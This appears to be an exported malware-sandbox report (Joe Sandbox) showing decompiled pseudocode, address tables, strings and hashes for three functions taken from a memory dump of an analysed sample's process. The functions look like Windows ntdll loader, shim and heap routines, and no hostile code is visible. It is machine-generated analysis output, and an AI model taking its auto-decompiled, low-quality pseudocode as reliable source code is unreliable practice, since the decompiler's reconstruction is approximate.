                                                                                                                                                                                            			E33CF9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x33dcbe98);
				E33D47C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				L33D38F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E33D09870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x33de65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E33D0A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E33D15A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || L33D104C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x33de65e0; // 0x756ea680
							 *0x33de91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x33de65e8;
									if(_t148 != 0) {
										 *0x33de91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E33D0DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E33D03B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E33D09870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = L33D5247B();
									goto L26;
								} else {
									_t152 = E33D0A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(L33D104C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                                                                                            0x33cf9046
                                                                                                                                                                                            0x33cf9046
                                                                                                                                                                                            0x33cf904b
                                                                                                                                                                                            0x33cf9050
                                                                                                                                                                                            0x33cf9055
                                                                                                                                                                                            0x33cf905b
                                                                                                                                                                                            0x33cf905d
                                                                                                                                                                                            0x33cf9066
                                                                                                                                                                                            0x33cf906f
                                                                                                                                                                                            0x33cf9078
                                                                                                                                                                                            0x33cf9080
                                                                                                                                                                                            0x33cf9088
                                                                                                                                                                                            0x33cf908f
                                                                                                                                                                                            0x33cf9095
                                                                                                                                                                                            0x33cf90a9
                                                                                                                                                                                            0x33cf90b1
                                                                                                                                                                                            0x33cf90be
                                                                                                                                                                                            0x33cf90c6
                                                                                                                                                                                            0x33cf90cf
                                                                                                                                                                                            0x33cf90e2
                                                                                                                                                                                            0x33cf90f7
                                                                                                                                                                                            0x33cf90fb
                                                                                                                                                                                            0x33cf9118
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf9123
                                                                                                                                                                                            0x33cf913b
                                                                                                                                                                                            0x33cf913f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf9147
                                                                                                                                                                                            0x33d5231f
                                                                                                                                                                                            0x33d5231f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5231f
                                                                                                                                                                                            0x33cf9154
                                                                                                                                                                                            0x33d52330
                                                                                                                                                                                            0x33d52336
                                                                                                                                                                                            0x33d52336
                                                                                                                                                                                            0x33cf915a
                                                                                                                                                                                            0x33cf915a
                                                                                                                                                                                            0x33cf915a
                                                                                                                                                                                            0x33cf9161
                                                                                                                                                                                            0x33cf9167
                                                                                                                                                                                            0x33cf916b
                                                                                                                                                                                            0x33cf9172
                                                                                                                                                                                            0x33cf9182
                                                                                                                                                                                            0x33cf918e
                                                                                                                                                                                            0x33cf9199
                                                                                                                                                                                            0x33cf91ba
                                                                                                                                                                                            0x33cf91be
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cf91e0
                                                                                                                                                                                            0x33d52358
                                                                                                                                                                                            0x33d52360
                                                                                                                                                                                            0x33d52368
                                                                                                                                                                                            0x33d5236a
                                                                                                                                                                                            0x33d52372
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d52378
                                                                                                                                                                                            0x33d52378
                                                                                                                                                                                            0x33d52381
                                                                                                                                                                                            0x33d52458
                                                                                                                                                                                            0x33d52458
                                                                                                                                                                                            0x33d5245b
                                                                                                                                                                                            0x33d52463
                                                                                                                                                                                            0x33d52468
                                                                                                                                                                                            0x33d5246e
                                                                                                                                                                                            0x33d5246e
                                                                                                                                                                                            0x33d524a7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d524a7
                                                                                                                                                                                            0x33d5238f
                                                                                                                                                                                            0x33d52396
                                                                                                                                                                                            0x33d5239c
                                                                                                                                                                                            0x33d5239f
                                                                                                                                                                                            0x33d5239f
                                                                                                                                                                                            0x33d523bb
                                                                                                                                                                                            0x33d523c8
                                                                                                                                                                                            0x33d523ca
                                                                                                                                                                                            0x33d523d2
                                                                                                                                                                                            0x33d5244c
                                                                                                                                                                                            0x33d5244c
                                                                                                                                                                                            0x33d52453
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d523d4
                                                                                                                                                                                            0x33d523e7
                                                                                                                                                                                            0x33d523e9
                                                                                                                                                                                            0x33d523f1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d523f9
                                                                                                                                                                                            0x33d52402
                                                                                                                                                                                            0x33d52408
                                                                                                                                                                                            0x33d5240c
                                                                                                                                                                                            0x33d52413
                                                                                                                                                                                            0x33d52423
                                                                                                                                                                                            0x33d5243f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d52441
                                                                                                                                                                                            0x33d52446
                                                                                                                                                                                            0x33d52446
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d52446
                                                                                                                                                                                            0x33d523fb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d523fb
                                                                                                                                                                                            0x33d523d2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d52372
                                                                                                                                                                                            0x33cf91be
                                                                                                                                                                                            0x33cf9118
                                                                                                                                                                                            0x33cf90fd
                                                                                                                                                                                            0x33cf9102
                                                                                                                                                                                            0x33cf910e

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: $$@
                                                                                                                                                                                            • API String ID: 3446177414-1194432280
                                                                                                                                                                                            • Opcode ID: 54e95a24f0fee32117201263956aacea978f72e7db9aec8625c3c8c6b88516ae
                                                                                                                                                                                            • Instruction ID: 2419cafdf69ee0773c6032dc755474d22435928c969147e6c0bd748424ad34a6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54e95a24f0fee32117201263956aacea978f72e7db9aec8625c3c8c6b88516ae
                                                                                                                                                                                            • Instruction Fuzzy Hash: 728129B2D002699BEB21CF54CD44BDEB7B8AF08750F0441EAE919F7250D7719E898FA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                                                                            			E33D1237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x33de38b8;
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x33de68d8; // 0x0
						if(_t22 != 0) {
							E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x33de68d8 = _t50;
							 *0x33de5d4c = _t50;
						}
					}
					 *0x33de38b8 = _t38;
					return _t55;
				}
				_t59 =  *0x33de68d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x33de38b8 = 0;
					_t55 = E33D71BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x33de68d8; // 0x0
						while( *_t51 != 0) {
							 *0x33de91e0(_t51, 0, "true", "true", 0, "true", 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x33de9218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E33CFFED0(0x33de32d8);
						if( *0x33de65f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E33CE6704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x33de32d8);
						E33CFE740(_t46);
						goto L21;
					}
					_t36 =  *0x33de37c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E33D6E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x33de37c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                                                                                                                                                            0x33d12383
                                                                                                                                                                                            0x33d1238b
                                                                                                                                                                                            0x33d1238d
                                                                                                                                                                                            0x33d12390
                                                                                                                                                                                            0x33d12393
                                                                                                                                                                                            0x33d12397
                                                                                                                                                                                            0x33d123a5
                                                                                                                                                                                            0x33d123a8
                                                                                                                                                                                            0x33d123aa
                                                                                                                                                                                            0x33d123b1
                                                                                                                                                                                            0x33d5a878
                                                                                                                                                                                            0x33d5a87d
                                                                                                                                                                                            0x33d5a883
                                                                                                                                                                                            0x33d5a883
                                                                                                                                                                                            0x33d123b1
                                                                                                                                                                                            0x33d123ba
                                                                                                                                                                                            0x33d123c3
                                                                                                                                                                                            0x33d123c3
                                                                                                                                                                                            0x33d12399
                                                                                                                                                                                            0x33d1239f
                                                                                                                                                                                            0x33d5a784
                                                                                                                                                                                            0x33d5a78f
                                                                                                                                                                                            0x33d5a793
                                                                                                                                                                                            0x33d5a7cd
                                                                                                                                                                                            0x33d5a80b
                                                                                                                                                                                            0x33d5a7e3
                                                                                                                                                                                            0x33d5a7e9
                                                                                                                                                                                            0x33d5a7ee
                                                                                                                                                                                            0x33d5a866
                                                                                                                                                                                            0x33d5a85f
                                                                                                                                                                                            0x33d5a85f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5a85f
                                                                                                                                                                                            0x33d5a7f0
                                                                                                                                                                                            0x33d5a7f2
                                                                                                                                                                                            0x33d5a7f2
                                                                                                                                                                                            0x33d5a7f5
                                                                                                                                                                                            0x33d5a7f5
                                                                                                                                                                                            0x33d5a7f8
                                                                                                                                                                                            0x33d5a7fb
                                                                                                                                                                                            0x33d5a808
                                                                                                                                                                                            0x33d5a808
                                                                                                                                                                                            0x33d5a812
                                                                                                                                                                                            0x33d5a817
                                                                                                                                                                                            0x33d5a81f
                                                                                                                                                                                            0x33d5a825
                                                                                                                                                                                            0x33d5a826
                                                                                                                                                                                            0x33d5a82d
                                                                                                                                                                                            0x33d5a82f
                                                                                                                                                                                            0x33d5a83b
                                                                                                                                                                                            0x33d5a83d
                                                                                                                                                                                            0x33d5a849
                                                                                                                                                                                            0x33d5a850
                                                                                                                                                                                            0x33d5a850
                                                                                                                                                                                            0x33d5a849
                                                                                                                                                                                            0x33d5a855
                                                                                                                                                                                            0x33d5a85a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5a85a
                                                                                                                                                                                            0x33d5a795
                                                                                                                                                                                            0x33d5a79c
                                                                                                                                                                                            0x33d5a7b4
                                                                                                                                                                                            0x33d5a7b9
                                                                                                                                                                                            0x33d5a7be
                                                                                                                                                                                            0x33d5a7c3
                                                                                                                                                                                            0x33d5a7c5
                                                                                                                                                                                            0x33d5a7c5
                                                                                                                                                                                            0x33d5a7c6
                                                                                                                                                                                            0x33d5a7c6
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • apphelp.dll, xrefs: 33D12382
                                                                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33D5A79F
                                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 33D5A7AF
                                                                                                                                                                                            • LdrpDynamicShimModule, xrefs: 33D5A7A5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                                                                            • Opcode ID: 0d43169e6fcbc185bbd77b0b7ce45cbce3b955fa698225583d8e21215f56868f
                                                                                                                                                                                            • Instruction ID: dd55f797f83299c1240b878fe03354f1441bab5934b0b5eedc97ab8dcb7bf92c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d43169e6fcbc185bbd77b0b7ce45cbce3b955fa698225583d8e21215f56868f
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1312676E10310EFFB11AF58C880A6A7BF9FB84B54F19005DF950B7650DB709942CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E33CEF8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x33deb370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x33de6960 - 2;
					if( *0x33de6960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E33CEB910();
						__eflags =  *0x33de5da8;
						if(__eflags == 0) {
							_t139 = 2;
							E33DAFC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return L33D34B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E33D978DE(_t141, _t161, 0, 8, 0);
					}
					E33CEFD8E(_t161, _t158);
					E33DB02EC(_t161);
					_t158 = 1;
					E33CE918A(_t161, 1, 0, 0);
					L33DB8E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x33de3758; // 0x0
					 *0x33de91e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E33D978DE(_t147, _t161, 0, 8, 0);
				}
				E33CEFD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E33D9F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E33CFFED0(0x33de4800);
						E33CEFAEC(_t161);
						_push(0x33de4800);
						E33CFE740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E33CEFABA( &_v92,  &_v96, 0x8000);
							_t91 = E33D03C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E33DADA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E33CEFABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E33CEFABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E33CEFA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E33D03C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E33D03C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									L33D32F90();
								}
							}
							_t107 = E33D03C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E33D03C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								L33D32F90();
							}
							if(E33D03C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E33DAD9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                                                                                                                                                            0x33cef8b0
                                                                                                                                                                                            0x33cef8b8
                                                                                                                                                                                            0x33cef8c2
                                                                                                                                                                                            0x33cef8c6
                                                                                                                                                                                            0x33cef8c9
                                                                                                                                                                                            0x33cef8ce
                                                                                                                                                                                            0x33d4e467
                                                                                                                                                                                            0x33d4e46e
                                                                                                                                                                                            0x33d4e474
                                                                                                                                                                                            0x33d4e47a
                                                                                                                                                                                            0x33d4e47e
                                                                                                                                                                                            0x33d4e49d
                                                                                                                                                                                            0x33d4e4a2
                                                                                                                                                                                            0x33d4e480
                                                                                                                                                                                            0x33d4e495
                                                                                                                                                                                            0x33d4e49a
                                                                                                                                                                                            0x33d4e4a8
                                                                                                                                                                                            0x33d4e4ad
                                                                                                                                                                                            0x33d4e4b2
                                                                                                                                                                                            0x33d4e4ba
                                                                                                                                                                                            0x33d4e4c2
                                                                                                                                                                                            0x33d4e4c3
                                                                                                                                                                                            0x33d4e4c3
                                                                                                                                                                                            0x33d4e4ba
                                                                                                                                                                                            0x33cef9f6
                                                                                                                                                                                            0x33cef9f6
                                                                                                                                                                                            0x33cef9f8
                                                                                                                                                                                            0x33cef9fc
                                                                                                                                                                                            0x33cef9fd
                                                                                                                                                                                            0x33cef9fe
                                                                                                                                                                                            0x33cefa09
                                                                                                                                                                                            0x33cefa09
                                                                                                                                                                                            0x33cef8db
                                                                                                                                                                                            0x33d4e4cd
                                                                                                                                                                                            0x33d4e4d3
                                                                                                                                                                                            0x33d4e4d6
                                                                                                                                                                                            0x33cefa37
                                                                                                                                                                                            0x33cefa37
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cefa37
                                                                                                                                                                                            0x33d4e4dc
                                                                                                                                                                                            0x33d4e4e1
                                                                                                                                                                                            0x33d4e4e3
                                                                                                                                                                                            0x33d4e4e9
                                                                                                                                                                                            0x33d4e4eb
                                                                                                                                                                                            0x33d4e4eb
                                                                                                                                                                                            0x33d4e4f2
                                                                                                                                                                                            0x33d4e4f9
                                                                                                                                                                                            0x33d4e504
                                                                                                                                                                                            0x33d4e505
                                                                                                                                                                                            0x33d4e50c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e50c
                                                                                                                                                                                            0x33cef8e8
                                                                                                                                                                                            0x33d4e516
                                                                                                                                                                                            0x33d4e51f
                                                                                                                                                                                            0x33d4e525
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e525
                                                                                                                                                                                            0x33cef8ee
                                                                                                                                                                                            0x33cef8ee
                                                                                                                                                                                            0x33cef8f5
                                                                                                                                                                                            0x33d4e530
                                                                                                                                                                                            0x33d4e532
                                                                                                                                                                                            0x33d4e532
                                                                                                                                                                                            0x33cef8fd
                                                                                                                                                                                            0x33cef909
                                                                                                                                                                                            0x33d4e53c
                                                                                                                                                                                            0x33d4e543
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4e54b
                                                                                                                                                                                            0x33d4e550
                                                                                                                                                                                            0x33d4e552
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef90f
                                                                                                                                                                                            0x33cef90f
                                                                                                                                                                                            0x33cef918
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef91e
                                                                                                                                                                                            0x33cef924
                                                                                                                                                                                            0x33cef92b
                                                                                                                                                                                            0x33cef930
                                                                                                                                                                                            0x33cef931
                                                                                                                                                                                            0x33cef936
                                                                                                                                                                                            0x33cef93c
                                                                                                                                                                                            0x33cef93e
                                                                                                                                                                                            0x33d4e55d
                                                                                                                                                                                            0x33d4e55f
                                                                                                                                                                                            0x33d4e563
                                                                                                                                                                                            0x33d4e56a
                                                                                                                                                                                            0x33d4e578
                                                                                                                                                                                            0x33d4e57c
                                                                                                                                                                                            0x33d4e581
                                                                                                                                                                                            0x33d4e586
                                                                                                                                                                                            0x33d4e588
                                                                                                                                                                                            0x33d4e59a
                                                                                                                                                                                            0x33d4e58a
